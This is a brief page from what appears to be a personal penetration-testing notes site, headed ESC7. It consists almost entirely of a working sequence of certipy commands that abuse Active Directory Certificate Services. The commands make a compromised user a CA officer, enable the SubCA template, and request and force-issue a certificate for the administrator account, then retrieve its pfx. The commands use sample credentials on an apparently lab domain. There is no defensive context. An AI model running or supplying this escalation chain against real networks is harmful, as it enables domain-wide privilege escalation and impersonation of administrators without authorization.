> For the complete documentation index, see [llms.txt](https://f1rstbyt3.gitbook.io/hacking-notes/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://f1rstbyt3.gitbook.io/hacking-notes/active-directory/adcs-exploitation/esc7.md).

# ESC7

```python
# Add pwned user as Officer
certipy ca -ca 'domain-DC01-CA' -username user@domain.htb -password 'D3veloP3r!123' -add-officer user

# Enable the SubCA template (if not enabled already)
certipy ca -ca 'domain-DC01-CA' -username user@domain.htb -password 'D3veloP3r!123' -enable-template 'SubCA'

# Request the certificate as administrator using the SubCA template
certipy req -ca 'domain-DC01-CA' -username user@domain.htb -password 'D3veloP3r!123' -target dc01.domain.htb -template SubCA -upn administrator@domain.htb

# issue the request to the CA 
certipy ca -ca 'domain-DC01-CA' -issue-request REQUEST-No. -username user@domain.htb -password 'D3veloP3r!123'

# Request the administrator pfx
certipy req -username user@domain.htb -password 'D3veloP3r!123' -ca domain-DC01-CA -target dc01.domain.htb -retrieve REQUEST-No.
```
